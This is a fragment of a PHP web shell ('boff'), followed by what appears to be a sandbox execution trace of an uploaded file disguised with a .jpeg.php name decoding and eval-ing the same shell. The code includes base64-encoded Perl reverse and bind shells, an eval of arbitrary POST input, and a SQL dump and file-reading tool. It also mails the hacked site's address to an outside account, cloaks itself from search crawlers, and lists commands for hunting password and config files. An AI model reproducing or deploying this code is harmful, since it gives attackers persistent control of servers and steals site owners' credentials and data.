'.(\$value==\$_POST['sql_base']?'selected':'').'>'.\$value.'</option>';\r\n\t\t\t}\r\n\t\t\techo '</select>';\r\n\t\t}\r\n\t\telse echo \$tmp;\r\n\t}else\r\n\t\techo \$tmp;\r\n\techo \"</td>\r\n\t\t\t\t<td><input type=submit value='>>' onclick='fs(d.sf);'></td>\r\n <td><input type=checkbox name=sql_count value='on'\" . (empty(\$_POST['sql_count'])?'':' checked') . \"> count the number of rows</td>\r\n\t\t\t</tr>\r\n\t\t</table>\r\n\t\t<script>\r\n s_db='\".@addslashes(\$_POST['sql_base']).\"';\r\n function fs(f) {\r\n if(f.sql_base.value!=s_db) { f.onsubmit = function() {};\r\n if(f.p1) f.p1.value='';\r\n if(f.p2) f.p2.value='';\r\n if(f.p3) f.p3.value='';\r\n }\r\n }\r\n\t\t\tfunction st(t,l) {\r\n\t\t\t\td.sf.p1.value = 'select';\r\n\t\t\t\td.sf.p2.value = t;\r\n if(l && d.sf.p3) d.sf.p3.value = l;\r\n\t\t\t\td.sf.submit();\r\n\t\t\t}\r\n\t\t\tfunction is() {\r\n\t\t\t\tfor(i=0;i<d.sf.elements['tbl[]'].length;++i)\r\n\t\t\t\t\td.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;\r\n\t\t\t}\r\n\t\t</script>\";\r\n\tif(isset(\$db) && \$db->link){\r\n\t\techo \"<br/><table width=100% cellpadding=2 cellspacing=0>\";\r\n\t\t\tif(!empty(\$_POST['sql_base'])){\r\n\t\t\t\t\$db->selectdb(\$_POST['sql_base']);\r\n\t\t\t\techo \"<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>\";\r\n\t\t\t\t\$tbls_res = \$db->listTables();\r\n\t\t\t\twhile(\$item = \$db->fetch(\$tbls_res)) {\r\n\t\t\t\t\tlist(\$key, \$value) = each(\$item);\r\n if(!empty(\$_POST['sql_count']))\r\n \$n = \$db->fetch(\$db->query('SELECT COUNT(*) as n FROM '.\$value.''));\r\n\t\t\t\t\t\$value = htmlspecialchars(\$value);\r\n\t\t\t\t\techo \"<nobr><input type='checkbox' name='tbl[]' value='\".\$value.\"'> <a href=# onclick=\\\"st('\".\$value.\"',1)\\\">\".\$value.\"</a>\" . (empty(\$_POST['sql_count'])?' ':\" <small>({\$n['n']})</small>\") . \"</nobr><br>\";\r\n\t\t\t\t}\r\n\t\t\t\techo \"<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\\\"download\\\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>\";\r\n\t\t\t\tif(@\$_POST['p1'] == 'select') {\r\n\t\t\t\t\t\$_POST['p1'] = 'query';\r\n \$_POST['p3'] = \$_POST['p3']?\$_POST['p3']:1;\r\n\t\t\t\t\t\$db->query('SELECT COUNT(*) as n FROM ' . \$_POST['p2']);\r\n\t\t\t\t\t\$num = \$db->fetch();\r\n\t\t\t\t\t\$pages = ceil(\$num['n'] / 30);\r\n echo \"<script>d.sf.onsubmit=function(){st(\\\"\" . \$_POST['p2'] . \"\\\", d.sf.p3.value)}</script><span>\".\$_POST['p2'].\"</span> ({\$num['n']} records) Page # <input type=text name='p3' value=\" . ((int)\$_POST['p3']) . \">\";\r\n echo \" of \$pages\";\r\n if(\$_POST['p3'] > 1)\r\n echo \" <a href=# onclick='st(\\\"\" . \$_POST['p2'] . '\", ' . (\$_POST['p3']-1) . \")'>< Prev</a>\";\r\n if(\$_POST['p3'] < \$pages)\r\n echo \" <a href=# onclick='st(\\\"\" . \$_POST['p2'] . '\", ' . (\$_POST['p3']+1) . \")'>Next ></a>\";\r\n \$_POST['p3']--;\r\n\t\t\t\t\tif(\$_POST['type']=='pgsql')\r\n\t\t\t\t\t\t\$_POST['p2'] = 'SELECT * FROM '.\$_POST['p2'].' LIMIT 30 OFFSET '.(\$_POST['p3']*30);\r\n\t\t\t\t\telse\r\n\t\t\t\t\t\t\$_POST['p2'] = 'SELECT * FROM `'.\$_POST['p2'].'` LIMIT '.(\$_POST['p3']*30).',30';\r\n\t\t\t\t\techo \"<br><br>\";\r\n\t\t\t\t}\r\n\t\t\t\tif((@\$_POST['p1'] == 'query') && !empty(\$_POST['p2'])) {\r\n\t\t\t\t\t\$db->query(@\$_POST['p2']);\r\n\t\t\t\t\tif(\$db->res !== false) {\r\n\t\t\t\t\t\t\$title = false;\r\n\t\t\t\t\t\techo '<table width=100% cellspacing=1 cellpadding=2 class=main style=\"background-color:#292929\">';\r\n\t\t\t\t\t\t\$line = 1;\r\n\t\t\t\t\t\twhile(\$item = \$db->fetch())\t{\r\n\t\t\t\t\t\t\tif(!\$title)\t{\r\n\t\t\t\t\t\t\t\techo '<tr>';\r\n\t\t\t\t\t\t\t\tforeach(\$item as \$key => \$value)\r\n\t\t\t\t\t\t\t\t\techo '<th>'.\$key.'</th>';\r\n\t\t\t\t\t\t\t\treset(\$item);\r\n\t\t\t\t\t\t\t\t\$title=true;\r\n\t\t\t\t\t\t\t\techo '</tr><tr>';\r\n\t\t\t\t\t\t\t\t\$line = 2;\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\techo '<tr class=\"l'.\$line.'\">';\r\n\t\t\t\t\t\t\t\$line = \$line==1?2:1;\r\n\t\t\t\t\t\t\tforeach(\$item as \$key => \$value) {\r\n\t\t\t\t\t\t\t\tif(\$value == null)\r\n\t\t\t\t\t\t\t\t\techo '<td><i>null</i></td>';\r\n\t\t\t\t\t\t\t\telse\r\n\t\t\t\t\t\t\t\t\techo '<td>'.nl2br(htmlspecialchars(\$value)).'</td>';\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\techo '</tr>';\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\techo '</table>';\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\techo '<div><b>Error:</b> '.htmlspecialchars(\$db->error()).'</div>';\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\techo \"<br></form><form onsubmit='d.sf.p1.value=\\\"query\\\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>\";\r\n if(!empty(\$_POST['p2']) && (\$_POST['p1'] != 'loadfile'))\r\n echo htmlspecialchars(\$_POST['p2']);\r\n echo \"</textarea><br/><input type=submit value='Execute'>\";\r\n\t\t\t\techo \"</td></tr>\";\r\n\t\t\t}\r\n\t\t\techo \"</table></form><br/>\";\r\n if(\$_POST['type']=='mysql') {\r\n \$db->query(\"SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'\");\r\n if(\$db->fetch())\r\n echo \"<form onsubmit='d.sf.p1.value=\\\"loadfile\\\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>\";\r\n }\r\n\t\t\tif(@\$_POST['p1'] == 'loadfile') {\r\n\t\t\t\t\$file = \$db->loadFile(\$_POST['p2']);\r\n\t\t\t\techo '<pre class=ml1>'.htmlspecialchars(\$file['file']).'</pre>';\r\n\t\t\t}\r\n\t} else {\r\n echo htmlspecialchars(\$db->error());\r\n }\r\n\techo '</div>';\r\n\tBOFFFooter();\r\n}\r\nfunction actionNetwork() {\r\n\tBOFFHeader();\r\n\t\$back_connect_p=\"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7\";\r\n\t\$bind_port_p=\"IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=\";\r\n\techo \"<h1>Network tools</h1><div class=content>\r\n\t<form name='nfp' onSubmit=\\\"g(null,null,'bpp',this.port.value);return false;\\\">\r\n\t<span>Bind port to /bin/sh [perl]</span><br/>\r\n\tPort: <input type='text' name='port' value='31337'> <input type=submit value='>>'>\r\n\t</form>\r\n\t<form name='nfp' onSubmit=\\\"g(null,null,'bcp',this.server.value,this.port.value);return false;\\\">\r\n\t<span>Back-connect [perl]</span><br/>\r\n\tServer: <input type='text' name='server' value='\". \$_SERVER['REMOTE_ADDR'] .\"'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>\r\n\t</form><br>\";\r\n\tif(isset(\$_POST['p1'])) {\r\n\t\tfunction cf(\$f,\$t) {\r\n\t\t\t\$w = @fopen(\$f,\"w\") or @function_exists('file_put_contents');\r\n\t\t\tif(\$w){\r\n\t\t\t\t@fwrite(\$w,@base64_decode(\$t));\r\n\t\t\t\t@fclose(\$w);\r\n\t\t\t}\r\n\t\t}\r\n\t\tif(\$_POST['p1'] == 'bpp') {\r\n\t\t\tcf(\"/tmp/bp.pl\",\$bind_port_p);\r\n\t\t\t\$out = BOFFEx(\"perl /tmp/bp.pl \".\$_POST['p2'].\" 1>/dev/null 2>&1 &\");\r\n\t\t\techo \"<pre class=ml1>\$out\\n\".BOFFEx(\"ps aux | grep bp.pl\").\"</pre>\";\r\n unlink(\"/tmp/bp.pl\");\r\n\t\t}\r\n\t\tif(\$_POST['p1'] == 'bcp') {\r\n\t\t\tcf(\"/tmp/bc.pl\",\$back_connect_p);\r\n\t\t\t\$out = BOFFEx(\"perl /tmp/bc.pl \".\$_POST['p2'].\" \".\$_POST['p3'].\" 1>/dev/null 2>&1 &\");\r\n\t\t\techo \"<pre class=ml1>\$out\\n\".BOFFEx(\"ps aux | grep bc.pl\").\"</pre>\";\r\n unlink(\"/tmp/bc.pl\");\r\n\t\t}\r\n\t}\r\n\techo '</div>';\r\n\tBOFFFooter();\r\n}\r\nfunction actionRC() {\r\n\tif(!@\$_POST['p1']) {\r\n\t\t\$a = array(\r\n\t\t\t\"uname\" => php_uname(),\r\n\t\t\t\"php_version\" => phpversion(),\r\n\t\t\t\"BOFF_version\" => BOFF_VERSION,\r\n\t\t\t\"safemode\" => @ini_get('safe_mode')\r\n\t\t);\r\n\t\techo serialize(\$a);\r\n\t} else {\r\n\t\teval(\$_POST['p1']);\r\n\t}\r\n}\r\nif( empty(\$_POST['a']) )\r\n\tif(isset(\$default_action) && function_exists('action' . \$default_action))\r\n\t\t\$_POST['a'] = \$default_action;\r\n\telse\r\n\t\t\$_POST['a'] = 'SecInfo';\r\nif( !empty(\$_POST['a']) && function_exists('action' . \$_POST['a']) )\r\n\tcall_user_func('action' . \$_POST['a']);\r\nexit;\r\n?>\r\n");
?> Execution traces
data/traces/f55807a3723aeea24a41d07d8e7fcbd7_trace-1676237170.9432.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 19:26:36.841004]
1 0 1 0.000153 393576
1 3 0 0.000355 430752 {main} 1 /var/www/html/uploads/yusa.php.jpeg.php 0 0
2 4 0 0.000379 430864 base64_decode 0 /var/www/html/uploads/yusa.php.jpeg.php 48 1 'eJzlvX1XGzcTOPo3PaffQWz9dO3GGNskbWowgRBISBNIeUnShPzctb22t6y97u4aQ1I+6++r3JnRy0r7Ykzy9LnnnktOwJZGo9FIGo1GoxFj8mfryXQ0Zd9/9/13rDR3u6zNSp3T/ZO3+ycfrRdnZ286L45Pz6xPm5jvTf4y8k/2fz/fPz3rnJ8cCohu0L8BEGt/eNM5nXp9N2QXk/PIDY+csdtiVm0Uj/1o6vY8x++NnDAql2KnNxj2P9qzCYDYnyqsZl1M3jhR9C4I+63vv1tUZjoHGCiDRV67UeQM3dbFxMKv+2tQ65Ub5lX6/Xdl1Qhba4TAJIs288qypKjF/3aOdl/vW7zoxeTwTQu4aSE3xo7nl635dMf3rtzaILSq1unI9X02iuNpa30d+Y08tarMIs5ZFSj2A3sH3cABuzesGwwG339XcmbxqDMFriB3EXupF/hBiN9+6A8eUUrfHTgzP+44vdgLJpBlH3i+G712JraePYvcjvOXcw0AcThz'
2 4 1 0.000482 459568
2 4 R 'x��}W\0337\0238�7=��Al�t��\030�$mj0�\020HH\023HyI҄�ܵ�������\032CR>��ܙ��J�bL���KN��F��H\032�F�\021c�g��t4e���w�4w���J�����\'\037�\027ggo:/�OϬO���M�2�O�?�?=뜟\034\n�nп\001\020kx�9�z}7d\027���\r����bVm\024��h�<�0*�b�7\030�?ڳ\t�؟*�f]L�8Q�.\b���[Tf:\a\030(�E^�Q�\f����¯�kP�\033�U��we�\b[k��$�6�ʲ���v�v_�[�����M\v�i!7Ǝ痭�t���� �����}6��ik}\035��<���"�Y\025(�\003{\a�\001�7�\033\f\006�Wrf�3\005� w\021{�\027�A��~�\017\036QJ�\03583?�8��\v&�e\037x�\033�v&��=��s\r\000q8s�,j�\033c�wޤ\03'
2 5 0 0.000869 459536 gzuncompress 0 /var/www/html/uploads/yusa.php.jpeg.php 48 1 'x��}W\0337\0238�7=��Al�t��\030�$mj0�\020HH\023HyI҄�ܵ�������\032CR>��ܙ��J�bL���KN��F��H\032�F�\021c�g��t4e���w�4w���J�����\'\037�\027ggo:/�OϬO���M�2�O�?�?=뜟\034\n�nп\001\020kx�9�z}7d\027���\r����bVm\024��h�<�0*�b�7\030�?ڳ\t�؟*�f]L�8Q�.\b���[Tf:\a\030(�E^�Q�\f����¯�kP�\033�U��we�\b[k��$�6�ʲ���v�v_�[�����M\v�i!7Ǝ痭�t���� �����}6��ik}\035��<���"�Y\025(�\003{\a�\001�7�\033\f\006�Wrf�3\005� w\021{�\027�A��~�\017\036QJ�\03583?�8��\v&�e\037x�\033�v&��=��s\r\000q8s�,j�\033c�wޤ\03'
2 5 1 0.001493 529200
2 5 R ' <?php \r\n\r\n $web = $_SERVER["HTTP_HOST"];\r\n $inj = $_SERVER["REQUEST_URI"];\r\n $body = "Egy_Spider \\nUserName: ".htmlspecialchars($tacfgd[\'uname\']) ."\\nPassWord:\r\n".htmlspecialchars($tacfgd[\'pword\'])."\\nMessage:\\n"."\\nE-server: ".htmlspecialchars\r\n($_SERVER[\'REQUEST_URI\'])."\\nE-server2: ".htmlspecialchars ($_SERVER["SERVER_NAME"])."\\n\\nIP: \r\n";\r\n mail("wp@live.fr","Shell http://$web$inj", "$body");\r\n# Web Shell by boff\r\n$auth_pass = "";\r\n$color = "#df5";\r\n$defau'
2 6 0 0.004039 992568 eval 1 '?> <?php \r\n\r\n $web = $_SERVER["HTTP_HOST"];\r\n $inj = $_SERVER["REQUEST_URI"];\r\n $body = "Egy_Spider \\nUserName: ".htmlspecialchars($tacfgd[\'uname\']) ."\\nPassWord:\r\n".htmlspecialchars($tacfgd[\'pword\'])."\\nMessage:\\n"."\\nE-server: ".htmlspecialchars\r\n($_SERVER[\'REQUEST_URI\'])."\\nE-server2: ".htmlspecialchars ($_SERVER["SERVER_NAME"])."\\n\\nIP: \r\n";\r\n mail("wp@live.fr","Shell http://$web$inj", "$body");\r\n# Web Shell by boff\r\n$auth_pass = "";\r\n$color = "#df5";\r\n$default_action = \'FilesMan\';\r\n$default_use_ajax = true;\r\n$default_charset = \'Windows-1251\';\r\n\r\nif(!empty($_SERVER[\'HTTP_USER_AGENT\'])) {\r\n $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");\r\n if(preg_match(\'/\' . implode(\'|\', $userAgents) . \'/i\', $_SERVER[\'HTTP_USER_AGENT\'])) {\r\n header(\'HTTP/1.0 404 Not Found\');\r\n exit;\r\n }\r\n}\r\n\r\n@session_start();\r\n@ini_set(\'error_log\',NULL);\r\n@ini_set(\'log_errors\',0);\r\n@ini_set(\'max_execution_time\',0);\r\n@set_time_limit(0);\r\n@set_magic_quotes_runtime(0);\r\n@define(\'BOFF_VERSION\', \'1.0\');\r\n\r\nif(get_magic_quotes_gpc()) {\r\n\tfunction BOFFstripslashes($array) {\r\n\t\treturn is_array($array) ? array_map(\'BOFFstripslashes\', $array) : stripslashes($array);\r\n\t}\r\n\t$_POST = BOFFstripslashes($_POST);\r\n}\r\n\r\nfunction BOFFLogin() {\r\n\tdie("<pre align=center><b>Authorization</b><br>�0ff \\/\\/3� $|-|311 1.0<br><form method=post>Password: <input type=password name=pass><input type=submit value=\'>>\'></form></pre>");\r\n}\r\n\r\nif(!isset($_SESSION[md5($_SERVER[\'HTTP_HOST\'])]))\r\n\tif( empty($auth_pass) || ( isset($_POST[\'pass\']) && (md5($_POST[\'pass\']) == $auth_pass) ) )\r\n\t\t$_SESSION[md5($_SERVER[\'HTTP_HOST\'])] = true;\r\n\telse\r\n\t\tBOFFLogin();\r\n\r\nif(strtolower(substr(PHP_OS,0,3)) == "win")\r\n\t$os = \'win\';\r\nelse\r\n\t$os = \'nix\';\r\n\r\n$safe_mode = @ini_get(\'safe_mode\');\r\nif(!$safe_mode)\r\n error_reporting(0);\r\n\r\n$disable_functions = @ini_get(\'disable_functions\');\r\n$home_cwd = @getcwd();\r\nif(isset($_POST[\'c\']))\r\n\t@chdir($_POST[\'c\']);\r\n$cwd = @getcwd();\r\nif($os == \'win\') {\r\n\t$home_cwd = str_replace("\\\\", "/", $home_cwd);\r\n\t$cwd = str_replace("\\\\", "/", $cwd);\r\n}\r\nif( $cwd[strlen($cwd)-1] != \'/\' )\r\n\t$cwd .= \'/\';\r\n\r\nif(!isset($_SESSION[md5($_SERVER[\'HTTP_HOST\']) . \'ajax\']))\r\n $_SESSION[md5($_SERVER[\'HTTP_HOST\']) . \'ajax\'] = (bool)$GLOBALS[\'default_use_ajax\'];\r\n\t\r\nif($os == \'win\')\r\n\t$aliases = array(\r\n\t\t"List Directory" => "dir",\r\n \t"Find index.php in current dir" => "dir /s /w /b index.php",\r\n \t"Find *config*.php in current dir" => "dir /s /w /b *config*.php",\r\n \t"Show active connections" => "netstat -an",\r\n \t"Show running services" => "net start",\r\n \t"User accounts" => "net user",\r\n \t"Show computers" => "net view",\r\n\t\t"ARP Table" => "arp -a",\r\n\t\t"IP Configuration" => "ipconfig /all"\r\n\t);\r\nelse\r\n\t$aliases = array(\r\n \t\t"List dir" => "ls -lha",\r\n\t\t"list file attributes on a Linux second extended file system" => "lsattr -va",\r\n \t\t"show opened ports" => "netstat -an | grep -i listen",\r\n "process status" => "ps aux",\r\n\t\t"Find" => "",\r\n \t\t"find all suid files" => "find / -type f -perm -04000 -ls",\r\n \t\t"find suid files in current dir" => "find . -type f -perm -04000 -ls",\r\n \t\t"find all sgid files" => "find / -type f -perm -02000 -ls",\r\n \t\t"find sgid files in current dir" => "find . -type f -perm -02000 -ls",\r\n \t\t"find config.inc.php files" => "find / -type f -name config.inc.php",\r\n \t\t"find config* files" => "find / -type f -name \\"config*\\"",\r\n \t\t"find config* files in current dir" => "find . -type f -name \\"config*\\"",\r\n \t\t"find all writable folders and files" => "find / -perm -2 -ls",\r\n \t\t"find all writable folders and files in current dir" => "find . -perm -2 -ls",\r\n \t\t"find all service.pwd files" => "find / -type f -name service.pwd",\r\n \t\t"find service.pwd files in current dir" => "find . -type f -name service.pwd",\r\n \t\t"find all .htpasswd files" => "find / -type f -name .htpasswd",\r\n \t\t"find .htpasswd files in current dir" => "find . -type f -name .htpasswd",\r\n \t\t"find all .bash_history files" => "find / -type f -name .bash_history",\r\n \t\t"find .bash_history files in current dir" => "find . -type f -name .bash_history",\r\n \t\t"find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",\r\n \t\t"find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",\r\n\t\t"Locate" => "",\r\n \t\t"locate httpd.conf files" => "locate httpd.conf",\r\n\t\t"locate vhosts.conf files" => "locate vhosts.conf",\r\n\t\t"locate proftpd.conf files" => "locate proftpd.conf",\r\n\t\t"locate psybnc.conf files" => "locate psybnc.conf",\r\n\t\t"locate my.conf files" => "locate my.conf",\r\n\t\t"locate admin.php files" =>"locate admin.php",\r\n\t\t"locate cfg.php files" => "locate cfg.php",\r\n\t\t"locate conf.php files" => "locate conf.php",\r\n\t\t"locate config.dat files" => "locate config.dat",\r\n\t\t"locate config.php files" => "locate config.php",\r\n\t\t"locate config.inc files" => "locate config.inc",\r\n\t\t"locate config.inc.php" => "locate config.inc.php",\r\n\t\t"locate config.default.php files" => "locate config.default.php",\r\n\t\t"locate config* files " => "locate config",\r\n\t\t"locate .conf files"=>"locate \'.conf\'",\r\n\t\t"locate .pwd files" => "locate \'.pwd\'",\r\n\t\t"locate .sql files" => "locate \'.sql\'",\r\n\t\t"locate .htpasswd files" => "locate \'.htpasswd\'",\r\n\t\t"locate .bash_history files" => "locate \'.bash_history\'",\r\n\t\t"locate .mysql_history files" => "locate \'.mysql_history\'",\r\n\t\t"locate .fetchmailrc files" => "locate \'.fetchmailrc\'",\r\n\t\t"locate backup files" => "locate backup",\r\n\t\t"locate dump files" => "locate dump",\r\n\t\t"locate priv files" => "locate priv"\t\r\n\t);\r\n\r\nfunction BOFFHeader() {\r\n\tif(empty($_POST[\'charset\']))\r\n\t\t$_POST[\'charset\'] = $GLOBALS[\'default_charset\'];\r\n\tglobal $color;\r\n\techo "<html><head><meta http-equiv=\'Content-Type\' content=\'text/html; charset=" . $_POST[\'charset\'] . "\'><title>" . $_SERVER[\'HTTP_HOST\'] . " - BOFF " . BOFF_VERSION ."</title>\r\n<style>\r\nbody{background-color:#000028;color:#e1e1e1;}\r\nbody,td,th{ border:1px outset black;font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }\r\ntable.info{ border-left:5px solid #df5;color:#fff;background-color:#000028; }\r\nspan,h1,a{ color: #df5 !important; }\r\nspan{ font-weight: bolder; }\r\nh1{ border-left:7px solid #df5;padding: 2px 5px;font: 14pt Verdana;background-color:#000028;margin:0px; }\r\ndiv.content{ padding: 7px;margin-left:7px;background-color:#333; }\r\na{ text-decoration:none; }\r\na:hover{ text-decoration:underline; }\r\n.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }\r\n.bigarea{ width:100%;height:250px; }\r\ninput,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid #df5; font: 9pt Monospace,\'Courier New\'; }\r\nform{ margin:0px; }\r\n#toolsTbl{ text-align:center; }\r\n.toolsInp{ width: 300px }\r\n.main th{text-align:left;background-color:#003300;}\r\n.main tr:hover{border:2px outset gray;;background-color:#5e5e5e}\r\n.l1{background-color:#444}\r\n.l2{background-color:#333}\r\npre{font-family:Courier,Monospace;}\r\n</style>\r\n<script>\r\n var c_ = \'" . htmlspecialchars($GLOBALS[\'cwd\']) . "\';\r\n var a_ = \'" . htmlspecialchars(@$_POST[\'a\']) ."\'\r\n var charset_ = \'" . htmlspecialchars(@$_POST[\'charset\']) ."\';\r\n var p1_ = \'" . ((strpos(@$_POST[\'p1\'],"\\n")!==false)?\'\':htmlspecialchars($_POST[\'p1\'],ENT_QUOTES)) ."\';\r\n var p2_ = \'" . ((strpos(@$_POST[\'p2\'],"\\n")!==false)?\'\':htmlspecialchars($_POST[\'p2\'],ENT_QUOTES)) ."\';\r\n var p3_ = \'" . ((strpos(@$_POST[\'p3\'],"\\n")!==false)?\'\':htmlspecialchars($_POST[\'p3\'],ENT_QUOTES)) ."\';\r\n var d = document;\r\n\tfunction set(a,c,p1,p2,p3,charset) {\r\n\t\tif(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;\r\n\t\tif(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;\r\n\t\tif(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;\r\n\t\tif(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;\r\n\t\tif(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;\r\n\t\tif(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;\r\n\t}\r\n\tfunction g(a,c,p1,p2,p3,charset) {\r\n\t\tset(a,c,p1,p2,p3,charset);\r\n\t\td.mf.submit();\r\n\t}\r\n\tfunction a(a,c,p1,p2,p3,charset) {\r\n\t\tset(a,c,p1,p2,p3,charset);\r\n\t\tvar params = \'ajax=true\';\r\n\t\tfor(i=0;i<d.mf.elements.length;i++)\r\n\t\t\tparams += \'&\'+d.mf.elements[i].name+\'=\'+encodeURIComponent(d.mf.elements[i].value);\r\n\t\tsr(\'" . addslashes($_SERVER[\'REQUEST_URI\']) ."\', params);\r\n\t}\r\n\tfunction sr(url, params) {\t\r\n\t\tif (window.XMLHttpRequest)\r\n\t\t\treq = new XMLHttpRequest();\r\n\t\telse if (window.ActiveXObject)\r\n\t\t\treq = new ActiveXObject(\'Microsoft.XMLHTTP\');\r\n if (req) {\r\n req.onreadystatechange = processReqChange;\r\n req.open(\'POST\', url, true);\r\n req.setRequestHeader (\'Content-Type\', \'application/x-www-form-urlencoded\');\r\n req.send(params);\r\n }\r\n\t}\r\n\tfunction processReqChange() {\r\n\t\tif( (req.readyState == 4) )\r\n\t\t\tif(req.status == 200) {\r\n\t\t\t\tvar reg = new RegExp(\\"(\\\\\\\\d+)([\\\\\\\\S\\\\\\\\s]*)\\", \'m\');\r\n\t\t\t\tvar arr=reg.exec(req.responseText);\r\n\t\t\t\teval(arr[2].substr(0, arr[1]));\r\n\t\t\t} else alert(\'Request error!\');\r\n\t}\r\n</script>\r\n<head><body><div style=\'position:absolute;width:100%;background-color:#444;top:0;left:0;\'>\r\n<form method=post name=mf style=\'display:none;\'>\r\n<input type=hidden name=a>\r\n<input type=hidden name=c>\r\n<input type=hidden name=p1>\r\n<input type=hidden name=p2>\r\n<input type=hidden name=p3>\r\n<input type=hidden name=charset>\r\n</form>";\r\n\t$freeSpace = @diskfreespace($GLOBALS[\'cwd\']);\r\n\t$totalSpace = @disk_total_space($GLOBALS[\'cwd\']);\r\n\t$totalSpace = $totalSpace?$totalSpace:1;\r\n\t$release = @php_uname(\'r\');\r\n\t$kernel = @php_uname(\'s\');\r\n\t$explink = \'http://exploit-db.com/list.php?description=\';\r\n\tif(strpos(\'Linux\', $kernel) !== false)\r\n\t\t$explink .= urlencode(\'Linux Kernel \' . substr($release,0,6));\r\n\telse\r\n\t\t$explink .= urlencode($kernel . \' \' . substr($release,0,3));\r\n\tif(!function_exists(\'posix_getegid\')) {\r\n\t\t$user = @get_current_user();\r\n\t\t$uid = @getmyuid();\r\n\t\t$gid = @getmygid();\r\n\t\t$group = "?";\r\n\t} else {\r\n\t\t$uid = @posix_getpwuid(posix_geteuid());\r\n\t\t$gid = @posix_getgrgid(posix_getegid());\r\n\t\t$user = $uid[\'name\'];\r\n\t\t$uid = $uid[\'uid\'];\r\n\t\t$group = $gid[\'name\'];\r\n\t\t$gid = $gid[\'gid\'];\r\n\t}\r\n\r\n\t$cwd_links = \'\';\r\n\t$path = explode("/", $GLOBALS[\'cwd\']);\r\n\t$n=count($path);\r\n\tfor($i=0; $i<$n-1; $i++) {\r\n\t\t$cwd_links .= "<a href=\'#\' onclick=\'g(\\"FilesMan\\",\\"";\r\n\t\tfor($j=0; $j<=$i; $j++)\r\n\t\t\t$cwd_links .= $path[$j].\'/\';\r\n\t\t$cwd_links .= "\\")\'>".$path[$i]."/</a>";\r\n\t}\r\n\r\n\t$charsets = array(\'UTF-8\', \'Windows-1251\', \'KOI8-R\', \'KOI8-U\', \'cp866\');\r\n\t$opt_charsets = \'\';\r\n\tforeach($charsets as $item)\r\n\t\t$opt_charsets .= \'<option value="\'.$item.\'" \'.($_POST[\'charset\']==$item?\'selected\':\'\').\'>\'.$item.\'</option>\';\r\n\r\n\t$m = array(\'Sec. 